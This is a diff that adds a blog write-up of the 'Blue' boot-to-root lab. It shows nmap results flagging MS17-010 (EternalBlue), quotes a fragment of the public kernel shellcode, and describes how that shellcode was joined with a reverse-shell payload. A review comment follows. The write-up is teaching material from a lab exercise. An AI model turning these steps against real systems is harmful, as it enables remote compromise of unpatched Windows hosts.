content/post/blue-boot2-root-writeup.md

```diff
@@ -0,0 +1,699 @@
+Host is up (0.0011s latency).
+
+PORT    STATE SERVICE
+445/tcp open  microsoft-ds
+|_clamav-exec: ERROR: Script execution failed (use -d to debug)
+MAC Address: 02:FF:5C:EF:7E:F3 (Unknown)
+
+Host script results:
+|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
+|_smb-vuln-ms10-054: false
+|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
+| smb-vuln-ms17-010: 
+|   VULNERABLE:
+|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
+|     State: VULNERABLE
+|     IDs:  CVE:CVE-2017-0143
+|     Risk factor: HIGH
+|       A critical remote code execution vulnerability exists in Microsoft SMBv1
+|        servers (ms17-010).
+|           
+|     Disclosure date: 2017-03-14
+|     References:
+|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
+|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
+|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
+
+Nmap done: 1 IP address (1 host up) scanned in 15.51 seconds
+```
+
+And once again the scans lead to the same conclusion that the host is vulnerable to eternalblue. So the next step was to hop on google and [exploitdb](https://www.exploit-db.com) to start looking for an exploit. 
+
+
+### Preparing the attack
+The first result that turned up was an exploit from Sleepya [Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) ](https://www.exploit-db.com/exploits/42031), while google pointed me to [worawit/MS17-010](https://github.com/worawit/MS17-010/). On further inspection they looked to be the same exploit however the worawit link provided shellcode that could be used as the basis for a payload.
+
+Looking further at the [eternalblue_kshellcode_x64.asm shellcode](https://github.com/worawit/MS17-010/blob/master/shellcode/eternalblue_kshellcode_x64.asm), it looked like the shellcode expected a user payload to be appended to the end of the binary both of which still needed to be prepared.
+
+```asm
+userland_start:
+userland_start_thread:
+    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
+    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
+    xor ecx, ecx    ; lpThreadAttributes = NULL
+    push rcx        ; lpThreadId = NULL
+    push rcx        ; dwCreationFlags = 0
+    mov r9, rcx     ; lpParameter = NULL
+    lea r8, [rel userland_payload]  ; lpStartAddr
+    mov edx, ecx    ; dwStackSize = 0
+    sub rsp, 0x20
+    call rax
+    add rsp, 0x30
+    ret
+    
+userland_payload:
+```
+
+With all this in mind, I then pulled down the python exploit script and shellcode and assembled the latter with nasm as a flat binary. Then I generated an unstaged tcp reverse shell for windows as a payload, also a flat binary, and joined the contents contents into a single `sc_joined.bin` payload. One pointless thing to note is I added an arbitrary nop sled to the payload. This could have been left out.
```

Comment:
I ~then~ pulled down

Then I generated an unstaged tcp reverse shell for windows as a payload, which was a flat binary, and I joined the ~contents~ contents into...